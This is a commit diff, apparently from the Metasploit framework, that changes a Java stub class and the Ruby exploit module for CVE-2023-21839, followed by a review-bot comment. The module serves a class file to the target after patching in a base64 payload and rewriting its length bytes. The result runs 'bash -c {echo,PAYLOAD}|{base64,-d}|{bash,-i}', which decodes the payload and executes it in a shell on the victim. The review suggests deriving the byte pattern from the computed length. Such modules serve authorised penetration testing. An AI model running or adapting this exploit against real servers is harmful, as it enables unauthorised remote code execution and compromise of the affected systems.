
Slight efficiency improvements

Grant Willcox 2023-05-24 17:36:39 -05:00
parent e80987ea59
commit 7ca7c6aee1
No known key found for this signature in database
GPG Key ID: 67522945A18C5562
3 changed files with 7 additions and 6 deletions


@ -1,3 +1,5 @@
import java.util.Base64;
public class PayloadRuns {
static {
try {
@ -6,4 +8,4 @@ public class PayloadRuns {
ex.printStackTrace();
}
}
}
}


@ -375,12 +375,11 @@ class MetasploitModule < Msf::Exploit::Remote
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
vprint_good("Payload requested by #{cli.peerhost} using #{agent}")
file = File.open(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21839', 'PayloadRuns.class'), 'rb')
class_raw = file.read
file.close
class_raw = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-21839', 'PayloadRuns.class'))
base64_payload = Rex::Text.encode_base64(payload.encoded)
command_length = (44 - 'PAYLOAD'.length) + base64_payload.length
class_raw = class_raw.gsub("\x00\x2C", [command_length].pack('S>'))
exec_command_length = 'bash -c {echo,PAYLOAD}|{base64,-d}|{bash,-i}'.length
command_length = (exec_command_length - 'PAYLOAD'.length) + base64_payload.length
class_raw = class_raw.gsub("\x00\x2C", [command_length].pack('n'))
class_raw = class_raw.gsub('PAYLOAD', base64_payload)
send_response(cli, 200, 'OK', class_raw)
end
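Review bot: The search pattern `"\x00\x2C"` on the first `gsub` line still hard-codes 44 as raw bytes, even though the new `exec_command_length` now derives that same number from the template string, so the two can drift apart if the template compiled into PayloadRuns.class ever changes. Building the pattern from the computed value, `class_raw = class_raw.gsub([exec_command_length].pack('n'), [command_length].pack('n'))`, keeps both sides tied to one definition. A one-line comment above it would help, for example `# 0x002C is the 16-bit big-endian length stored in front of the template string; rewrite it to the patched length`, which is presumably what these bytes represent and should be confirmed against the class file. The template literal itself would read better as a named constant, since it duplicates a string that lives in the Java source.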